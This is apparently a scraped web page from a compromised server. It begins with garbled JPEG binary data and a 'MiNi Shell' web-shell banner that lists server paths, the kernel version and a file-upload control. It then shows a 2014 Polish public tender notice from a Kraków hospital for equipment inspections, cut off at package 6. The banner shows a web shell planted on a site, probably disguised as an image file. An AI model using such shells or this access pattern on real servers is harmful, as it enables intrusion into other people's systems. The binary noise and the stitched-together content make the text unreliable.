JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141107/233795-N-2014.html

<p class="kh_header"><b>Kraków: Przeglądy urządzeń będących w gestii Działu Głównego Energetyka KSS</b><br>
<b>Numer ogłoszenia: 233795 - 2014; data zamieszczenia: 07.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Krakowski Szpital Specjalistyczny im. Jana Pawła II , ul. Prądnicka 80, 31-202 Kraków, woj. małopolskie, tel. 012 6142551, faks 012 6142551.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitaljp2.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeglądy urządzeń będących w gestii Działu Głównego Energetyka KSS.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeglądy urządzeń będących w gestii Działu Głównego Energetyka KSS.
Szacunkowa wartość zamówienia powyżej 730000,00 PLN netto, poniżej 790000,00     PLN netto..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.53.24.00-7, 45.23.22.00-4, 31.00.00.00-6, 50.73.00.00-1, 50.00.00.00-5, 50.53.13.00-9, 50.51.10.00-0, 50.53.23.00-6, 45.33.30.00-0, 45.21.51.40-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu.
Dodatkowo, w tym zakresie Wykonawca jest zobligowany do wykazania, że w okresie 3 lat przed upływem terminu składania ofert, albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał co najmniej:
dla pakietu 1-jedno zamówienie, zawierające przegląd zasilaczy UPS i zasilaczy buforowych prądu stałego o wartości minimum 25 000,00 zł brutto,
dla pakietu 2-jedno zamówienie, zawierające obsługę i konserwację rozdzielni i sieci dystrybucyjnych średniego napięcia o wartości minimum 10 000,00 zł brutto,
dla pakietu 6-jedno zamówienie, zawierające przegląd lub naprawę sprężarek o wartości minimum 20 000,00 zł brutto,
dla pakietu 7-jedno zamówienie, zawierające przegląd lub naprawę sprężarek o wartości minimum 5 000,00 zł brutto,
dla pakietu 8-jedno zamówienie, zawierające przegląd lub naprawę pomp o wartości minimum 15 000,00 zł brutto,
dla pakietu 9-jedno zamówienie, zawierające przegląd lub naprawę pomp o wartości minimum 5 000,00 zł brutto,
dla pakietu 10-jedno zamówienie, zawierające przegląd sprężarek o wartości minimum 10 000,00 zł brutto,
dla pakietu 11-jedno zamówienie, zawierające przegląd osuszaczy o wartości minimum 10 000,00 zł brutto,
dla pakietu 12-jedno zamówienie, zawierające przegląd lub naprawę pomp o wartości minimum 10 000,00 zł brutto,
dla pakietu 13-jedno zamówienie, zawierające przegląd agregatów prądotwórczych o wartości minimum 20 000,00 zł brutto,
dla pakietu 14-jedno zamówienie, zawierające przegląd lub naprawę pomp o wartości minimum 10 000,00 zł brutto,
dla pakietu 15-jedno zamówienie, zawierające przegląd lub naprawę punktów informacyjnych i sygnalizatorów stanu gazów medycznych o wartości minimum 25 000,00 zł brutto,
dla pakietu 16-jedno zamówienie, zawierające przegląd lub naprawę punktów informacyjnych i sygnalizatorów stanu gazów medycznych o wartości minimum 10 000,00 zł brutto,
dla pakietu 17-jedno zadanie, zawierające przegląd lub naprawę punktów informacyjnych i sygnalizatorów stanu gazów medycznych o wartości minimum 3 000,00 zł brutto,
dla pakietu 18-jedno zamówienie, zawierające przegląd osuszaczy o wartości minimum 10 000,00 zł brutto,
dla pakietu 19-jedno zamówienie, zawierające przegląd zestawów hydroforowych o wartości minimum 5 000,00 zł brutto.
Wartość zamówienia to wartość umowy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu. 
Dodatkowo, w tym zakresie Wykonawca zobligowany jest wykazać, że najpóźniej w chwili rozpoczęcia realizacji zamówienia będzie dysponował:
dla pakietu 1 dwoma osobami posiadającymi świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją (E) i dozorem (D) urządzeń, instalacji i sieci elektroenergetycznych na stanowisku eksploatacji i dozoru będących przedmiotem zamówienia zgodnie z Rozporządzeniem Ministra Gospodarki i Polityki Społecznej (Dz.U. nr 89 z 2003 r., poz. 828) w zakresie: GRUPA 1 - zakres uprawnień objętych zamówieniem;  lub inne równoważne świadectwa kwalifikacyjne, wydane na podstawie wcześniej obowiązujących przepisów lub na terenie innego kraju, jeżeli zgodnie z prawem polskim uprawniają one do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji i dozoru,

dla pakietu 2 jedną osobą posiadającą świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją (E) i dozorem (D) urządzeń, instalacji i sieci elektroenergetycznych na stanowisku eksploatacji i dozoru będących przedmiotem zamówienia zgodnie z Rozporządzeniem Ministra Gospodarki i Polityki Społecznej (Dz.U. nr 89 z 2003 r., poz. 828) w zakresie: GRUPA 1, podgrupa 3, 10- uprawniające do wykonywania prac przy urządzeniach do 15kV lub więcej -zakres uprawnień objętych zamówieniem;  lub inne równoważne świadectwa kwalifikacyjne, wydane na podstawie wcześniej obowiązujących przepisów lub na terenie innego kraju, jeżeli zgodnie z prawem polskim uprawniają one do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji i dozoru, i dwoma osobami posiadającymi świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją (E) urządzeń, instalacji i sieci elektroenergetycznych na stanowisku eksploatacji będących przedmiotem zamówienia zgodnie z Rozporządzeniem Ministra Gospodarki i Polityki Społecznej (Dz.U. nr 89 z 2003 r., poz. 828) w zakresie: GRUPA 1- uprawniające do wykonywania prac przy urządzeniach do 15kV lub więcej - zakres uprawnień objętych zamówieniem;  lub inne równoważne świadectwa kwalifikacyjne, wydane na podstawie wcześniej obowiązujących przepisów lub na terenie innego kraju, jeżeli zgodnie z prawem polskim uprawniają one do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji,

dla pakietu 3 dwoma osobami posiadającymi świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją (E) i dozorem (D) urządzeń, instalacji i sieci elektroenergetycznych na stanowisku eksploatacji i dozoru będących przedmiotem zamówienia zgodnie z Rozporządzeniem Ministra Gospodarki i Polityki Społecznej (Dz.U. nr 89 z 2003 r., poz. 828) w zakresie: GRUPA 1, podgrupa 3,10- uprawniające do wykonywania prac przy urządzeniach do 1kV lub więcej - zakres uprawnień objętych zamówieniem;  lub inne równoważne świadectwa kwalifikacyjne, wydane na podstawie wcześniej obowiązujących przepisów lub na terenie innego kraju, jeżeli zgodnie z prawem polskim uprawniają one do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji i dozoru,

dla pakietu 4 dwoma osobami posiadającymi świadectwo kwalifikacyjne uprawniające do zajmowania się dozorem (D) urządzeń, wytwarzające, przetwarzające, przesyłające i zużywające ciepło oraz inne urządzenia energetyczne na stanowisku dozoru będących przedmiotem zamówienia zgodnie z Rozporządzeniem Ministra Gospodarki i Polityki Społecznej (Dz.U. nr 89 z 2003 r., poz. 828) w zakresie: GRUPA 2, podgrupa 2,3,5,7- zakres uprawnień objętych zamówieniem;  lub inne równoważne świadectwa kwalifikacyjne, wydane na podstawie wcześniej obowiązujących przepisów lub na terenie innego kraju, jeżeli zgodnie z prawem polskim uprawniają one do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku dozoru; i dwoma osobami posiadającymi świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją (E) urządzeń, instalacji i sieci elektroenergetycznych na stanowisku eksploatacji będących przedmiotem zamówienia zgodnie z Rozporządzeniem Ministra Gospodarki i Polityki Społecznej (Dz.U. nr 89 z 2003 r., poz. 828) w zakresie: GRUPA 1, podgrupa 2, 5, 9- uprawniające do wykonywania prac przy urządzeniach do 1kV lub więcej - zakres uprawnień objętych zamówieniem;  lub inne równoważne świadectwa kwalifikacyjne, wydane na podstawie wcześniej obowiązujących przepisów lub na terenie innego kraju, jeżeli zgodnie z prawem polskim uprawniają one do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji;
i dwoma osobami posiadającymi świadectwo kwalifikacji w zakresie napraw i obsługi technicznej urządzeń i instalacji chłodniczych zawierających substancje kontrolowane (zgodnie z ustawą o substancjach zubażających warstwę ozonową z dnia 20 kwietnia 2004 r Dz.U. nr 121, poz.1263 z późn. zm.) lub inne równoważne świadectwa kwalifikacyjne, wydane na podstawie wcześniej obowiązujących przepisów lub na terenie innego kraju, jeżeli zgodnie z prawem polskim uprawniają one do zajmowania się naprawą i obsługą techniczną urządzeń i instalacji chłodniczych zawierających substancje kontrolowane,

dla pakietu 5 dwoma osobami posiadającymi świadectwo kwalifikacyjne uprawniające do zajmowania się dozorem (D) urządzeń, wytwarzające, przetwarzające, przesyłające i zużywające ciepło oraz inne urządzenia energetyczne na stanowisku dozoru będących przedmiotem zamówienia zgodnie z Rozporządzeniem Ministra Gospodarki i Polityki Społecznej (Dz.U. nr 89 z 2003 r., poz. 828) w zakresie: GRUPA 2, podgrupa 2,3,5,7- zakres uprawnień objętych zamówieniem;  lub inne równoważne świadectwa kwalifikacyjne, wydane na podstawie wcześniej obowiązujących przepisów lub na terenie innego kraju, jeżeli zgodnie z prawem polskim uprawniają one do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku dozoru; i dwoma osobami posiadającymi świadectwo kwalifikacyjne uprawniające do zajmowania się dozorem (D) urządzeń, instalacji i sieci elektroenergetycznych na stanowisku dozoru będących przedmiotem zamówienia zgodnie z Rozporządzeniem Ministra Gospodarki i Polityki Społecznej (Dz.U. nr 89 z 2003 r., poz. 828) w zakresie: GRUPA 1, podgrupa 2, 5, 9- uprawniające do wykonywania prac przy urządzeniach do 1kV lub więcej - zakres uprawnień objętych zamówieniem;  lub inne równoważne świadectwa kwalifikacyjne, wydane na podstawie wcześniej obowiązujących przepisów lub na terenie innego kraju, jeżeli zgodnie z prawem polskim uprawniają one do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku dozoru; i dwoma osobami posiadającymi świadectwo kwalifikacji w zakresie napraw i obsługi technicznej urządzeń i instalacji  zawierających substancje kontrolowane (zgodnie z ustawą o substancjach zubażających warstwę ozonową z dnia 20 kwietnia 2004 r Dz.U. nr 121, poz.1263 z późn. zm.) lub inne równoważne świadectwa kwalifikacyjne, wydane na podstawie wcześniej obowiązujących przepisów lub na terenie innego kraju, jeżeli zgodnie z prawem polskim uprawniają one do zajmowania się naprawą i obsługą techniczną urządzeń i instalacji zawierających substancje kontrolowane.

Zamawiający dopuszcza łączenie uprawnień w ramach pakietu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności. Zmiany umowy są dopuszczalne bez ograniczeń w zakresie dozwolonym przez art. 44 ustawy Prawo Zamówień Publicznych. Zmiana umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy jest możliwa, w szczególności gdy:
a. wymagać tego będzie prawidłowa realizacja przez Zamawiającego zadań polegających na udzieleniu świadczeń zdrowotnych, lub
b. w wyniku zmiany umowy możliwym będzie podniesienie poziomu lub jakości usług lub dostarczanego sprzętu, lub
c. zmiana umowy będzie korzystna dla Zamawiającego, lub
d. potrzeba zmiany treści umowy wynika ze zmiany przepisów prawa, lub
e. potrzeba zmiany treści umowy wynika ze zmian organizacyjnych Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitaljp2.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Krakowski Szpital Specjalistyczny im Jana Pawła II w Krakowie, ul. Prądnicka 80, 31-202 Kraków, Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.11.2014 godzina 10:00, miejsce: Krakowski Szpital Specjalistyczny im Jana Pawła II w Krakowie, ul. Prądnicka 80, 31-202 Kraków, w budynku Administracyjno-Konferencyjnym (Dziennik Podawczy).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1: Przeglądy zasilaczy UPS i zasilaczy buforowych prądu stałego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeglądy zasilaczy UPS i zasilaczy buforowych prądu stałego
Szacunkowa wartość zamówienia powyżej 15000,00 PLN netto poniżej 25000,00 PLN netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.24.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2: Obsługa techniczna rozdzielni i wewnętrznych sieci dystrybucyjnych średniego napięcia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obsługa techniczna rozdzielni i wewnętrznych sieci dystrybucyjnych średniego napięcia
Szacunkowa wartość zamówienia powyżej 30000,00 PLN netto poniżej 40000,00 PLN netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.22.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas reakcji na zgłoszenie awarii - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3: Naprawa sieci izolowanej IT.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa sieci izolowanej IT
Szacunkowa wartość zamówienia powyżej 120000,00 PLN netto poniżej 140000,00  PLN netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.00.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4: Okresowy przegląd urządzeń chłodniczych udokumentowany indywidualnie dla każdego urządzenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Okresowy przegląd urządzeń chłodniczych udokumentowany indywidualnie dla każdego urządzenia
Szacunkowa wartość zamówienia powyżej 35000,00 PLN netto poniżej 40000,00 PLN netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.73.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5: Przegląd roczny instalacji wentylacyjnych udokumentowany indywidualnie dla każdego urządzenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd roczny instalacji wentylacyjnych udokumentowany indywidualnie dla każdego urządzenia
Szacunkowa wartość zamówienia powyżej 55000,00 PLN netto poniżej 65000,00 PLN netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.73.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6: Przeglądy i naprawy sprężarek śrubowych typ L05 i L07.</p>
